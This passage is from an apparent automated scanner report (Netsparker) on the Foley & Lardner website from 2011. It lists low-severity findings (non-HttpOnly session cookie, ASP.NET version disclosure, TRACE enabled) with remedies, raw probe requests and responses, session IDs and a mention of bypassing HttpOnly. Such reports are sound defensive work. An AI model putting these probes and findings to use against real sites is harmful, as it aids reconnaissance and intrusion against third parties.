Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /services/industry_detail.aspx

/services/industry_detail.aspx CONFIRMED

http://www.foley.com/services/industry_detail.aspx?industryid=19

Identified Cookie

ASP.NET_SessionId

Request

GET /services/industry_detail.aspx?industryid=19 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.foley.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 15 Apr 2011 21:31:16 GMT
X-Powered-By: ASP.NET
x-prodtype: 01
x-client: 000425
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=oshpx245ruyrty45makfeinx; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 26804



<HTML>
<HEAD>
<title>
Foley & Lardner LLP - Our Services - Energy Industry
</title>
<meta content="Foley & Lardner LLP brings solutions to the varied participants in the electric and gas industries. Our experience with the industry dates to its origin and has continued through every stage of development. We continue to have the capability to meet all of the increasingly varied legal needs of our energy sector clients." name=description>
<meta content="Solutions Foley delivers to the energy industry are comprehensive. They include experiences ranging from developing the processes that created the applicable regulations (and deregulations) in different jurisdictions; to the provision of legal services for all phases of business within the traditional, vertically integrated utility; to the development of the wide array of sophisticated financing, tax, fuel, siting, land use, joint ventures, and intellectual property tools required to serve regulated and unregulated industry participants in this increasingly competitive market. Due to the scale and size of the industry, Foley delivers a full range of legal services to the many publicly traded clients involved with the industry.In addition to the regulated service providers, these participants include energy service companies rolling up service companies through acquisition programs; greenfield GenCo developers; GenCo's participating in facility auctions or carve-outs to roll up substantial generating assets; industry players using project finance and other non-recourse financing techniques to support ESCO and GENCO activities; participants requiring the development and implementation of securitization solutions; and clients needing various innovative corporate structurings or restructurings to better meet business objectives in the Public Utility Holding Company Act, tax, state regulatory and corporate law thicket in which this industry operates. Foley provides these solutions to producers and users of energy products, and to the financial participants in the energy industry.In recent years, Foley has undertaken nearly 30 energy company public financings involving debentures, mortgage bonds, preferred stock and common stock, and been involved in six mergers of publicly traded participants.In addition to its project finance work throughout the country, Foley has recently played a key role with electric utilities in applying the principles of asset securitization to the energy industry. In 1998, Foley served as co-counsel to Commonwealth Edison of Illinois in a $3.4 billion asset-backed securities offering that was the country's largest such offering that year. The AAA-rated securities have played a significant role in balance sheet stabilization for the utility during its transition to free-market conditions." name=keywords>
<LINK href="/include/main.css" type="text/css" rel="stylesheet"></LINK>
<script src="/include/mouseover.js"></script>
<script src="/include/main.js"></script>
</HEAD>
<body vLink="#7e2907" leftMargin="0" background="/img/bg.gif" topMargin="0" marginwidth="0" marginheight="0">
<!-- HEADER BEGIN -->

<!---------Header----------->

<script src="../include/imgpopup.js"></script>
<center>
<style>
body {margin-top:42px;}
</style>
<table border="0" cellpadding="0" cellspacing="0">
<tr valign="top">
<td><img src="/img/spacer.gif" width="16" height="39" border="0" alt=""><br>
<img src="/img/arrow_left2.gif" width="16" height="282" border="0" alt=""></td>
<td colspan="2">
<table border="0" cellpadding="0" cellspacing="1" width="750">
<tr valign="top">
<td bgcolor="#ffffff">
<table border="0" cellpadding="0" cellspacing="1" width="750">
<tr valign="top">
<td><a href="/home.aspx"><img src="/img/logo_foley_lardner.gif" border="0" alt="Foley &amp; Lardner LLP"></a></td>
<td align="right"><img src="/img/spacer.gif" width="17" height="8" border="0" alt=""><br>
<img src="/img/toolbar/l_toolbar.gif" width="81" height="16" border="0" alt="Toolbar" name="toolbar"><a href="/sitesearch.aspx"><img src="/img/toolbar/i_search.gif" width="17" height="13" border="0" alt="Search" onMouseOut="changeImg('search','i_search');changeImg('toolbar','l_toolbar');" onMouseOver="changeImg('search','io_search');changeImg('toolbar','l_search');" name="search"></a><a href="javascript:popup_external('http%3a%2f%2fwww.foley.com%2fservices%2findustry_detail.aspx%3findustryid%3d19%26print%3dtrue');"><img src="/img/toolbar/i_print.gif" width="17" height="13" border="0" alt="Print" onMouseOut="changeImg('print','i_print');changeImg('toolbar','l_toolbar');" onMouseOver="changeImg('print','io_print');changeImg('toolbar','l_print');" name="print"></a><a href="javascript:popup_external_emailfriend('/admin/emailfriend.aspx?link=http%3a%2f%2fwww.foley.com%2fservices%2findustry_detail.aspx%3findustryid%3d19%5eemail%3dtrue');"><img src="/img/toolbar/i_email.gif" width="17" height="13" border="0" alt="Email this Page" onMouseOut="changeImg('email','i_email');changeImg('toolbar','l_toolbar');" onMouseOver="changeImg('email','io_email');changeImg('toolbar','l_email');" name="email"></a><a href="/briefcase/savepage.aspx?name=Our+Services+-+Energy+Industry&url=http%3a%2f%2fwww.foley.com%2fservices%2findustry_detail.aspx%3findustryid%3d19"><img src="/img/toolbar/i_save.gif" width="17" height="13" border="0" alt="Save" onMouseOut="changeImg('save','i_save');changeImg('toolbar','l_toolbar');" onMouseOver="changeImg('save','io_save');changeImg('toolbar','l_save');" name="save"></a><a href="/help.aspx"><img src="/img/toolbar/i_help.gif" width="17" height="13" border="0" alt="Help" onMouseOut="changeImg('help','i_help');changeImg('toolbar','l_toolbar');" onMouseOver="changeImg('help','io_help');changeImg('toolbar','l_help');" name="help"></a><img src="/img/spacer.gif" width="4" height="13" border="0" alt=""><br>
</td>
</tr>
<!---------END Header----------->
<!---------Page Header----------->
<tr valign="top">
<td colspan="2">
<!-- Flash Nav -->
<script language ="javascript">
if(blnIsMacIE){

document.write('')
} else {

document.write('')
}


if ( !blnHasFlash ) {

document.write('<div style="POSITION:absolute;width:748px;TOP:140px;">');


document.write('<img src="/img/nav/main.gif" width=748 height=20 border=0 alt="" usemap="#main"><br>');
document.write('<img src="/img/nav/services.gif" width=748 height=20 border=0 alt="" usemap="#Services">');


document.write('</div>');

}
else
{
var flashstring = "";

flashstring = flashstring + "<div style=\"POSITION:absolute;width:748px;TOP:119px;\"><OBJECT codeBase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0\" height=\"100\" width=\"748\" classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" VIEWASTEXT><PARAM NAME=\"_cx\" VALUE=\"19791\">";
flashstring = flashstring + "<PARAM NAME=\"_cy\" VALUE=\"1111\">";
flashstring = flashstring + "<PARAM NAME=\"FlashVars\" VALUE=\"\">";
flashstring = flashstring + "<PARAM NAME=\"Movie\" VALUE=\"/nav_interior.swf?top=services\">";
flashstring = flashstring + "<PARAM NAME=\"Src\" VALUE=\"/nav_interior.swf?top=services\">";
flashstring = flashstring + "<PARAM NAME=\"WMode\" VALUE=\"Transparent\">";
flashstring = flashstring + "<PARAM NAME=\"Play\" VALUE=\"-1\">";
flashstring = flashstring + "<PARAM NAME=\"Loop\" VALUE=\"-1\">";
flashstring = flashstring + "<PARAM NAME=\"Quality\" VALUE=\"High\">";
flashstring = flashstring + "<PARAM NAME=\"SAlign\" VALUE=\"\">";
flashstring = flashstring + "<PARAM NAME=\"Menu\" VALUE=\"-1\">";
flashstring = flashstring + "<PARAM NAME=\"Base\" VALUE=\"\">";
flashstring = flashstring + "<PARAM NAME=\"AllowScriptAccess\" VALUE=\"always\">";
flashstring = flashstring + "<PARAM NAME=\"Scale\" VALUE=\"ShowAll\">";
flashstring = flashstring + "<PARAM NAME=\"DeviceFont\" VALUE=\"0\">";
flashstring = flashstring + "<PARAM NAME=\"EmbedMovie\" VALUE=\"0\">";
flashstring = flashstring + "<PARAM NAME=\"BGColor\" VALUE=\"FFFFFF\">";
flashstring = flashstring + "<PARAM NAME=\"SWRemote\" VALUE=\"\">";
flashstring = flashstring + "<PARAM NAME=\"MovieData\" VALUE=\"\">";
flashstring = flashstring + "<param name=\"width\" value=\"748\">";
flashstring = flashstring + "<param name=\"height\" value=\"100\">";
flashstring = flashstring + "<EMBED src=\"/nav_interior.swf?top=services\" quality=\"high\" wmode=\"transparent\" bgcolor=\"#FFFFFF\" WIDTH=\"748\" HEIGHT=\"100\" TYPE=\"application/x-shockwave-flash\" PLUGINSPAGE=\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\"></EMBED></OBJECT></div>";

document.write('<script src="/include/control.js"></scr');
document.write('ipt>');
}
</script><!-- END Flash Nav --><img src="/img/nav_bg.gif" width="748" height="20" border="0" alt=""><br>
<img src="/img/spacer.gif" width="1" height="1" border="0" alt=""><br>
<img src="/files/tbl_s7Industries/HeaderImage324/19/enrgy.jpg" width="748" height="82" border="0" alt="Energy Industry"></td>
</tr>
<!---------END Page Header----------->
<!---------Middle Section----------->
<tr valign="top">
<td bgcolor="#c1c8cd" colspan="2"><table border="0" cellpadding="0" cellspacing="1">
<tr valign="top">
<td class="mainbody" align="middle" colspan="3">
<table border="0" cellpadding="0" cellspacing="0" width="746">
<!-- -->

<!-- -->
<tr valign="top">
<td class="body" background="/img/arrow_bg1.gif" style="BACKGROUND-REPEAT:no-repeat" width="30"><img src="/img/spacer.gif" width="30" height="304" border="0" alt=""></td>
<td class="body" background="/img/arrow_bg2.gif" style="BACKGROUND-REPEAT:no-repeat" width="716">
<!-- -->

<br>
<br>

<!-- HEADER END -->
<!-- BODY CONTENT BEGIN -->



<span id="lblContent">From public company mergers and acquisitions to divesture auctions, securities offerings, compliance issues, and litigation, the Energy Industry Team <a id="linkTE" href="http://www.foley.com/people/people_results.aspx?industryID=19">attorneys</a> at Foley helps clients achieve their goals. Whether working with a client whose core business is energy or handling non-core projects that involve some facet of the industry, Foley's experienced attorneys are key strategic partners from due diligence, negotiation, and regulatory approval, to closing. Through our <a id="linkTE" href="http://www.foley.com/about/genpage.aspx?genpageid=000034354824">project management and budgeting capabilities</a>, we help clients maintain control of their projects and the associated expenses.

<p class="MarketingBodyCopy"><a id="linkTE" href="http://www.foley.com/about/genpage.aspx?genpageid=000033266224">View a list of representative energy transactions</a>.

<p class="MarketingBodyCopy"><span class="159080721-05122006"><a id="linkTE" href="http://www.foley.com/files/Energy_Industry_Deals.pdf" target="_blank">View a map highlighting states where we have completed energy deals</a>.</span>

<p class="MarketingBodyCopy">Areas where we regularly assist our clients include:

<ul>
<li>
<div class="MarketingBodyCopy"><a id="linkTE" href="http://www.foley.com/about/genpage.aspx?genpageid=000033269324">Corporate and Business Transactions</a></div>
</li>

<li>
<div class="MarketingBodyCopy"><a id="linkTE" href="http://www.foley.com/about/genpage.aspx?genpageid=000033269524">Investigations and Litigation</a></div>
</li>

<li>
<div class="MarketingBodyCopy"><span class="880423218-20032007"><a id="linkTE" href="http://www.foley.com/about/genpage.aspx?genpageid=000033269624">Federal, State and Local Government Regulations and Public Policy</a></span></div>
</li>

<li>
<div class="MarketingBodyCopy"><a id="linkTE" href="http://www.foley.com/about/genpage.aspx?genpageid=000033269724">Energy Facility Development</a></div>
</li>

<li>
<div class="MarketingBodyCopy"><span class="030273516-22032007"><a id="linkTE" href="http://www.foley.com/about/genpage.aspx?genpageid=000033269724&fulldesc=1">Renewables</a></span></div>
</li>
</ul>
<br><br><img src="/img/spacer.gif" width=1 height=18></span>
<!-- BODY CONTENT END -->
<!-- SEPARATOR BEGIN -->

<br><br>

</td>
<td class="rightside" width="235"><br>

<!-- SEPARATOR END -->
<!-- RIGHT-SIDE CONTENT BEGIN -->
<span id="lblHighlight"><div class=margin><img vspace=6 src="/img/title/highlights.gif" width=185 height=25 border=0 alt="Highlights"><br><table border=0 cellpadding=0 cellspacing=0 width=90%><tr valign=top><td class=body><script language ="javascript">
if ( !blnHasFlash )
{

}
else
{
var flashstring = '';

flashstring = flashstring + '<OBJECT codeBase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" height="107" width="178" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" VIEWASTEXT>';
flashstring = flashstring + '<PARAM NAME="Movie" VALUE="/files/tbl_s84Highlights/FileUpload562/331/energy.swf">';
flashstring = flashstring + '<PARAM NAME="Src" VALUE="/files/tbl_s84Highlights/FileUpload562/331/energy.swf">';
flashstring = flashstring + '<PARAM NAME="WMode" VALUE="Transparent">';
flashstring = flashstring + '<PARAM NAME="Quality" VALUE="High">';
flashstring = flashstring + '<PARAM NAME="SAlign" VALUE="">';
flashstring = flashstring + '<PARAM NAME="Menu" VALUE="-1">';
flashstring = flashstring + '<PARAM NAME="Base" VALUE="">';
flashstring = flashstring + '<PARAM NAME="AllowScriptAccess" VALUE="always">';
flashstring = flashstring + '<PARAM NAME="Scale" VALUE="ShowAll">';
flashstring = flashstring + '<PARAM NAME="DeviceFont" VALUE="0">';
flashstring = flashstring + '<PARAM NAME="EmbedMovie" VALUE="0">';
flashstring = flashstring + '<PARAM NAME="BGColor" VALUE="FFFFFF">';
flashstring = flashstring + '<PARAM NAME="SWRemote" VALUE="">';
flashstring = flashstring + '<param name="Width" value="178">';
flashstring = flashstring + '<param..
ASP.NET Version Disclosure

ASP.NET Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing ASP.NET version in the HTTP response. This information can help an attacker to develop further attacks and also the system can become an easier target for automated attacks. It was leaked from X-AspNet-Version banner of HTTP response or default ASP.NET error page.

Impact

An attacker can use disclosed information to harvest specific security vulnerabilities for the version identified. The attacker can also use this information in conjunction with the other vulnerabilities in the application or web server.

Remedy

Apply the following changes on your web.config file to prevent information leakage by using custom error pages and removing X-AspNet-Version from HTTP responses.
<System.Web>
     < httpRuntime enableVersionHeader="false" /> 
     <customErrors mode="On" defaultRedirect="~/error/GeneralError.aspx">
          <error statusCode="403" redirect="~/error/Forbidden.aspx" />
          <error statusCode="404" redirect="~/error/PageNotFound.aspx" />
          <error statusCode="500" redirect="~/error/InternalError.aspx" />
     </customErrors>
</System.Web>

Remedy References

- /services/industry_detail.aspx

/services/industry_detail.aspx

http://www.foley.com/services/industry_detail.aspx?industryid=19

Extracted Version

X-AspNet-Version: 1.1.4322

Request

GET /services/industry_detail.aspx?industryid=19 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.foley.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 15 Apr 2011 21:31:17 GMT
X-Powered-By: ASP.NET
x-prodtype: 01
x-client: 000425
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=uvtk3c55520wvbul3cwhz4ad; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 26804



<HTML>
<HEAD>
<title>
Foley & Lardner LLP - Our Services - Energy Industry
</title>
<meta content="Foley & Lardner LLP brings solutions to the varied participants in the electric and gas industries. Our experience with the industry dates to its origin and has continued through every stage of development. We continue to have the capability to meet all of the increasingly varied legal needs of our energy sector clients." name=description>
<meta content="Solutions Foley delivers to the energy industry are comprehensive. They include experiences ranging from developing the processes that created the applicable regulations (and deregulations) in different jurisdictions; to the provision of legal services for all phases of business within the traditional, vertically integrated utility; to the development of the wide array of sophisticated financing, tax, fuel, siting, land use, joint ventures, and intellectual property tools required to serve regulated and unregulated industry participants in this increasingly competitive market. Due to the scale and size of the industry, Foley delivers a full range of legal services to the many publicly traded clients involved with the industry.In addition to the regulated service providers, these participants include energy service companies rolling up service companies through acquisition programs; greenfield GenCo developers; GenCo's participating in facility auctions or carve-outs to roll up substantial generating assets; industry players using project finance and other non-recourse financing techniques to support ESCO and GENCO activities; participants requiring the development and implementation of securitization solutions; and clients needing various innovative corporate structurings or restructurings to better meet business objectives in the Public Utility Holding Company Act, tax, state regulatory and corporate law thicket in which this industry operates. Foley provides these solutions to producers and users of energy products, and to the financial participants in the energy industry.In recent years, Foley has undertaken nearly 30 energy company public financings involving debentures, mortgage bonds, preferred stock and common stock, and been involved in six mergers of publicly traded participants.In addition to its project finance work throughout the country, Foley has recently played a key role with electric utilities in applying the principles of asset securitization to the energy industry. In 1998, Foley served as co-counsel to Commonwealth Edison of Illinois in a $3.4 billion asset-backed securities offering that was the country's largest such offering that year. The AAA-rated securities have played a significant role in balance sheet stabilization for the utility during its transition to free-market conditions." name=keywords>
<LINK href="/include/main.css" type="text/css" rel="stylesheet"></LINK>
<script src="/include/mouseover.js"></script>
<script src="/include/main.js"></script>
</HEAD>
<body vLink="#7e2907" leftMargin="0" background="/img/bg.gif" topMargin="0" marginwidth="0" marginheight="0">
<!-- HEADER BEGIN -->

<!---------Header----------->

<script src="../include/imgpopup.js"></script>
<center>
<style>
body {margin-top:42px;}
</style>
<table border="0" cellpadding="0" cellspacing="0">
<tr valign="top">
<td><img src="/img/spacer.gif" width="16" height="39" border="0" alt=""><br>
<img src="/img/arrow_left2.gif" width="16" height="282" border="0" alt=""></td>
<td colspan="2">
<table border="0" cellpadding="0" cellspacing="1" width="750">
<tr valign="top">
<td bgcolor="#ffffff">
<table border="0" cellpadding="0" cellspacing="1" width="750">
<tr valign="top">
<td><a href="/home.aspx"><img src="/img/logo_foley_lardner.gif" border="0" alt="Foley &amp; Lardner LLP"></a></td>
<td align="right"><img src="/img/spacer.gif" width="17" height="8" border="0" alt=""><br>
<img src="/img/toolbar/l_toolbar.gif" width="81" height="16" border="0" alt="Toolbar" name="toolbar"><a href="/sitesearch.aspx"><img src="/img/toolbar/i_search.gif" width="17" height="13" border="0" alt="Search" onMouseOut="changeImg('search','i_search');changeImg('toolbar','l_toolbar');" onMouseOver="changeImg('search','io_search');changeImg('toolbar','l_search');" name="search"></a><a href="javascript:popup_external('http%3a%2f%2fwww.foley.com%2fservices%2findustry_detail.aspx%3findustryid%3d19%26print%3dtrue');"><img src="/img/toolbar/i_print.gif" width="17" height="13" border="0" alt="Print" onMouseOut="changeImg('print','i_print');changeImg('toolbar','l_toolbar');" onMouseOver="changeImg('print','io_print');changeImg('toolbar','l_print');" name="print"></a><a href="javascript:popup_external_emailfriend('/admin/emailfriend.aspx?link=http%3a%2f%2fwww.foley.com%2fservices%2findustry_detail.aspx%3findustryid%3d19%5eemail%3dtrue');"><img src="/img/toolbar/i_email.gif" width="17" height="13" border="0" alt="Email this Page" onMouseOut="changeImg('email','i_email');changeImg('toolbar','l_toolbar');" onMouseOver="changeImg('email','io_email');changeImg('toolbar','l_email');" name="email"></a><a href="/briefcase/savepage.aspx?name=Our+Services+-+Energy+Industry&url=http%3a%2f%2fwww.foley.com%2fservices%2findustry_detail.aspx%3findustryid%3d19"><img src="/img/toolbar/i_save.gif" width="17" height="13" border="0" alt="Save" onMouseOut="changeImg('save','i_save');changeImg('toolbar','l_toolbar');" onMouseOver="changeImg('save','io_save');changeImg('toolbar','l_save');" name="save"></a><a href="/help.aspx"><img src="/img/toolbar/i_help.gif" width="17" height="13" border="0" alt="Help" onMouseOut="changeImg('help','i_help');changeImg('toolbar','l_toolbar');" onMouseOver="changeImg('help','io_help');changeImg('toolbar','l_help');" name="help"></a><img src="/img/spacer.gif" width="4" height="13" border="0" alt=""><br>
</td>
</tr>
<!---------END Header----------->
<!---------Page Header----------->
<tr valign="top">
<td colspan="2">
<!-- Flash Nav -->
<script language ="javascript">
if(blnIsMacIE){

document.write('')
} else {

document.write('')
}


if ( !blnHasFlash ) {

document.write('<div style="POSITION:absolute;width:748px;TOP:140px;">');


document.write('<img src="/img/nav/main.gif" width=748 height=20 border=0 alt="" usemap="#main"><br>');
document.write('<img src="/img/nav/services.gif" width=748 height=20 border=0 alt="" usemap="#Services">');


document.write('</div>');

}
else
{
var flashstring = "";

flashstring = flashstring + "<div style=\"POSITION:absolute;width:748px;TOP:119px;\"><OBJECT codeBase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0\" height=\"100\" width=\"748\" classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" VIEWASTEXT><PARAM NAME=\"_cx\" VALUE=\"19791\">";
flashstring = flashstring + "<PARAM NAME=\"_cy\" VALUE=\"1111\">";
flashstring = flashstring + "<PARAM NAME=\"FlashVars\" VALUE=\"\">";
flashstring = flashstring + "<PARAM NAME=\"Movie\" VALUE=\"/nav_interior.swf?top=services\">";
flashstring = flashstring + "<PARAM NAME=\"Src\" VALUE=\"/nav_interior.swf?top=services\">";
flashstring = flashstring + "<PARAM NAME=\"WMode\" VALUE=\"Transparent\">";
flashstring = flashstring + "<PARAM NAME=\"Play\" VALUE=\"-1\">";
flashstring = flashstring + "<PARAM NAME=\"Loop\" VALUE=\"-1\">";
flashstring = flashstring + "<PARAM NAME=\"Quality\" VALUE=\"High\">";
flashstring = flashstring + "<PARAM NAME=\"SAlign\" VALUE=\"\">";
flashstring = flashstring + "<PARAM NAME=\"Menu\" VALUE=\"-1\">";
flashstring = flashstring + "<PARAM NAME=\"Base\" VALUE=\"\">";
flashstring = flashstring + "<PARAM NAME=\"AllowScriptAccess\" VALUE=\"always\">";
flashstring = flashstring + "<PARAM NAME=\"Scale\" VALUE=\"ShowAll\">";
flashstring = flashstring + "<PARAM NAME=\"DeviceFont\" VALUE=\"0\">";
flashstring = flashstring + "<PARAM NAME=\"EmbedMovie\" VALUE=\"0\">";
flashstring = flashstring + "<PARAM NAME=\"BGColor\" VALUE=\"FFFFFF\">";
flashstring = flashstring + "<PARAM NAME=\"SWRemote\" VALUE=\"\">";
flashstring = flashstring + "<PARAM NAME=\"MovieData\" VALUE=\"\">";
flashstring = flashstring + "<param name=\"width\" value=\"748\">";
flashstring = flashstring + "<param name=\"height\" value=\"100\">";
flashstring = flashstring + "<EMBED src=\"/nav_interior.swf?top=services\" quality=\"high\" wmode=\"transparent\" bgcolor=\"#FFFFFF\" WIDTH=\"748\" HEIGHT=\"100\" TYPE=\"application/x-shockwave-flash\" PLUGINSPAGE=\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\"></EMBED></OBJECT></div>";

document.write('<script src="/include/control.js"></scr');
document.write('ipt>');
}
</script><!-- END Flash Nav --><img src="/img/nav_bg.gif" width="748" height="20" border="0" alt=""><br>
<img src="/img/spacer.gif" width="1" height="1" border="0" alt=""><br>
<img src="/files/tbl_s7Industries/HeaderImage324/19/enrgy.jpg" width="748" height="82" border="0" alt="Energy Industry"></td>
</tr>
<!---------END Page Header----------->
<!---------Middle Section----------->
<tr valign="top">
<td bgcolor="#c1c8cd" colspan="2"><table border="0" cellpadding="0" cellspacing="1">
<tr valign="top">
<td class="mainbody" align="middle" colspan="3">
<table border="0" cellpadding="0" cellspacing="0" width="746">
<!-- -->

<!-- -->
<tr valign="top">
<td class="body" background="/img/arrow_bg1.gif" style="BACKGROUND-REPEAT:no-repeat" width="30"><img src="/img/spacer.gif" width="30" height="304" border="0" alt=""></td>
<td class="body" background="/img/arrow_bg2.gif" style="BACKGROUND-REPEAT:no-repeat" width="716">
<!-- -->

<br>
<br>

<!-- HEADER END -->
<!-- BODY CONTENT BEGIN -->



<span id="lblContent">From public company mergers and acquisitions to divesture auctions, securities offerings, compliance issues, and litigation, the Energy Industry Team <a id="linkTE" href="http://www.foley.com/people/people_results.aspx?industryID=19">attorneys</a> at Foley helps clients achieve their goals. Whether working with a client whose core business is energy or handling non-core projects that involve some facet of the industry, Foley's experienced attorneys are key strategic partners from due diligence, negotiation, and regulatory approval, to closing. Through our <a id="linkTE" href="http://www.foley.com/about/genpage.aspx?genpageid=000034354824">project management and budgeting capabilities</a>, we help clients maintain control of their projects and the associated expenses.

<p class="MarketingBodyCopy"><a id="linkTE" href="http://www.foley.com/about/genpage.aspx?genpageid=000033266224">View a list of representative energy transactions</a>.

<p class="MarketingBodyCopy"><span class="159080721-05122006"><a id="linkTE" href="http://www.foley.com/files/Energy_Industry_Deals.pdf" target="_blank">View a map highlighting states where we have completed energy deals</a>.</span>

<p class="MarketingBodyCopy">Areas where we regularly assist our clients include:

<ul>
<li>
<div class="MarketingBodyCopy"><a id="linkTE" href="http://www.foley.com/about/genpage.aspx?genpageid=000033269324">Corporate and Business Transactions</a></div>
</li>

<li>
<div class="MarketingBodyCopy"><a id="linkTE" href="http://www.foley.com/about/genpage.aspx?genpageid=000033269524">Investigations and Litigation</a></div>
</li>

<li>
<div class="MarketingBodyCopy"><span class="880423218-20032007"><a id="linkTE" href="http://www.foley.com/about/genpage.aspx?genpageid=000033269624">Federal, State and Local Government Regulations and Public Policy</a></span></div>
</li>

<li>
<div class="MarketingBodyCopy"><a id="linkTE" href="http://www.foley.com/about/genpage.aspx?genpageid=000033269724">Energy Facility Development</a></div>
</li>

<li>
<div class="MarketingBodyCopy"><span class="030273516-22032007"><a id="linkTE" href="http://www.foley.com/about/genpage.aspx?genpageid=000033269724&fulldesc=1">Renewables</a></span></div>
</li>
</ul>
<br><br><img src="/img/spacer.gif" width=1 height=18></span>
<!-- BODY CONTENT END -->
<!-- SEPARATOR BEGIN -->

<br><br>

</td>
<td class="rightside" width="235"><br>

<!-- SEPARATOR END -->
<!-- RIGHT-SIDE CONTENT BEGIN -->
<span id="lblHighlight"><div class=margin><img vspace=6 src="/img/title/highlights.gif" width=185 height=25 border=0 alt="Highlights"><br><table border=0 cellpadding=0 cellspacing=0 width=90%><tr valign=top><td class=body><script language ="javascript">
if ( !blnHasFlash )
{

}
else
{
var flashstring = '';

flashstring = flashstring + '<OBJECT codeBase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" height="107" width="178" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" VIEWASTEXT>';
flashstring = flashstring + '<PARAM NAME="Movie" VALUE="/files/tbl_s84Highlights/FileUpload562/331/energy.swf">';
flashstring = flashstring + '<PARAM NAME="Src" VALUE="/files/tbl_s84Highlights/FileUpload562/331/energy.swf">';
flashstring = flashstring + '<PARAM NAME="WMode" VALUE="Transparent">';
flashstring = flashstring + '<PARAM NAME="Quality" VALUE="High">';
flashstring = flashstring + '<PARAM NAME="SAlign" VALUE="">';
flashstring = flashstring + '<PARAM NAME="Menu" VALUE="-1">';
flashstring = flashstring + '<PARAM NAME="Base" VALUE="">';
flashstring = flashstring + '<PARAM NAME="AllowScriptAccess" VALUE="always">';
flashstring = flashstring + '<PARAM NAME="Scale" VALUE="ShowAll">';
flashstring = flashstring + '<PARAM NAME="DeviceFont" VALUE="0">';
flashstring = flashstring + '<PARAM NAME="EmbedMovie" VALUE="0">';
flashstring = flashstring + '<PARAM NAME="BGColor" VALUE="FFFFFF">';
flashstring = flashstring + '<PARAM NAME="SWRemote" VALUE="">';
flashstring = flashstring + '<param name="Width" value="178">';
flashstring = flashstring + '<param..
TRACE / TRACK Identified

TRACE / TRACK Identified

1 TOTAL
LOW
CONFIRMED
1
Netsparker identified that the TRACE/TRACK method is allowed.

Impact

If the application is vulnerable to Cross-site Scripting and uses Http-Only Cookies then an attacker can bypass the Http-Only cookies limitation and read the cookies in an XSS attack.

Remedy

Disable this method in all production systems. Even though the application is not vulnerable to Cross-site Scripting a debugging feature such as TRACE/TRACK should not be required in a production system and therefore should be disabled.

External References

- /services/industry_detail.aspx

/services/industry_detail.aspx CONFIRMED

http://www.foley.com/services/industry_detail.aspx?industryid=19

Request

TRACE /services/industry_detail.aspx?industryid=19 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.foley.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 15 Apr 2011 21:31:16 GMT
X-Powered-By: ASP.NET
x-prodtype: 01
x-client: 000425
Content-Type: message/http
Content-Length: 229


TRACE /services/industry_detail.aspx?industryid=19 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.foley.com
Accept-Encoding: gzip, deflate

Forbidden Resource

Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /services/

/services/ CONFIRMED

http://www.foley.com/services/

Request

GET /services/ HTTP/1.1
Referer: http://www.foley.com/services/industry_detail.aspx?industryid=19
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.foley.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Fri, 15 Apr 2011 21:31:16 GMT
Connection: close
Content-Type: text/html
Content-Length: 172


<html><head><title>Directory Listing Denied</title></head><body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>
ASP.NET Identified

ASP.NET Identified

1 TOTAL
INFORMATION
Netsparker identified that the target web site is using ASP.NET as web application framework. This issue is reported as extra information only.

Impact

This issue is reported as extra information, there is no direct impact resulting from this issue.
- /services/industry_detail.aspx

/services/industry_detail.aspx

http://www.foley.com/services/industry_detail.aspx?industryid=19

Request

DEBUG /services/industry_detail.aspx?industryid=19 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.foley.com
Cookie: ASP.NET_SessionId=oshpx245ruyrty45makfeinx
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Server: Microsoft-IIS/5.0
Date: Fri, 15 Apr 2011 21:31:17 GMT
X-Powered-By: ASP.NET
x-prodtype: 01
x-client: 000425
X-AspNet-Version: 1.1.4322
